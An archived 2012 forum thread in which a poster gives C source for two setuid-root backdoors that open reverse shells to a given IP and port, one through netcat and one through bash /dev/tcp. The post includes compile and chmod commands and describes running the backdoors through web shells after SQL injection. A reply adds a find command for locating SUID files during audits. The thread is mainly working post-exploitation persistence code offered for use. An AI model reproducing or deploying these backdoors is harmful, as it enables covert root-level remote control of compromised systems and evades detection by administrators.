PDA

View Full Version : Post Exploitation - Run backdoor with root privileges



b0nd
01-03-2012, 04:30 AM
Scenario:

You managed to slip into target somehow, it could be by exploiting n/w layer vulnerability or through web vulnerabilities. Let's take the case of web vulnerability exploitation e.g. sql injection and you managed to upload and run a web shell (c99, r57 etc.) there.
Further assumption - web server is running as non-root, which is a general case and recommended. You spawn a reverse connect interactive shell and running a local privilege escalation exploit managed to escalate privilege to root account.
With root access you can of course do anything - create a new account with root privilege or escalate the privilege of web server account so that reverse connect gives root privilege etc. But they raise eyebrows and could be detected easily.

Another, one of the smart, move could be to make your backdoor always run as root even when executed by a normal user and spawn a root shell - A SUID shell backdoor. This method is recommended when you have constant non-root access to the target.

Case 1. Execute netcat through web shell to spawn reverse connect interactive shell with root privilege:
Prerequisites: Either nc is already there or upload one and you have root access at the moment to run commands.

Create a 'c' backdoor: backdoor.c


# include <stdio.h>
# include <string.h>

int main(int argc, char* argv[])
{
char cmd[1024];
if(argc < 2) { printf ("Please enter IP address and port."); exit(0); }

setuid(0);
strcpy(cmd, "/bin/nc "); // or the relative path where netcat resides
strcat(cmd, argv[1]);
strcat(cmd, " ");
strcat(cmd, argv[2]);
strcat(cmd, " -e /bin/bash");

system(cmd);
}
// Executing: /bin/nc <IP> <Port> -e /bin/bash

Setuid is an access right flag which can be set on a binary. When it is set, it permits a non-root user to execute it with root privilege.

Compile with:


root$ gcc -o backdoor backdoor.c

Now set the setuid bit:

root$ chmod 4755 backdoor or root$ chmod a+s backdoor


Now the execution of backdoor binary by a non-root user would spawn netcat reverse connect with root privilege.

Case 2. Use "netcat without netcat" technique to spawn reverse connect interactive shell with root privilege:
Prerequisite: /dev/tcp is available to use. Though I am not sure but in few of recent *nix distros it's disabled.

Compile the following code as we did in Case 1:

# include <stdio.h>
# include <string.h>

int main(int argc, char* argv[])
{
char cmd[1024];
if(argc < 2) { printf ("Please enter IP address and port.\n"); exit(0); }

setuid(0);
strcpy(cmd, "/bin/bash -i > /dev/tcp/");
strcat(cmd, argv[1]);
strcat(cmd, "/");
strcat(cmd, argv[2]);
strcat(cmd, " ");
strcat(cmd, " 0<&1 2>&1");
system(cmd);
}
// Executing: /bin/bash -i > /dev/tcp/10.10.0.1/8080 0<&1 2>&1

Finally execute the binary through web shell:

/absolute or relative path/backdoor [IP Address] [Port]

The overall dependencies of this method:
1. PHP shouldn't be hardened to disable all of the following functions to prohibit you from executing commands through your web shell:

Passthru
Exec
System
Shell_exec

Cheers and Happy Hacking!

neo
01-03-2012, 09:49 AM
Nice post, after long time seen your in action bond :)
Well but when ever I do audit of *nix system I always do

find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
to find out the suid files in the system ;-)

b0nd
01-03-2012, 10:57 AM
Nice post, after long time seen your in action bond :)
Well but when ever I do audit of *nix system I always do

find . -type f \( -perm -4000 -o -perm -2000 \) -exec ls {} \; 2>/dev/null
to find out the suid files in the system ;-)
:) I shall amend the "overall dependencies" above and mention that pentester should not be smart enough to look for suid files.

btw credit for "netcat without netcat" goes to you for introducing the technique to me earlier. I use that quite often now.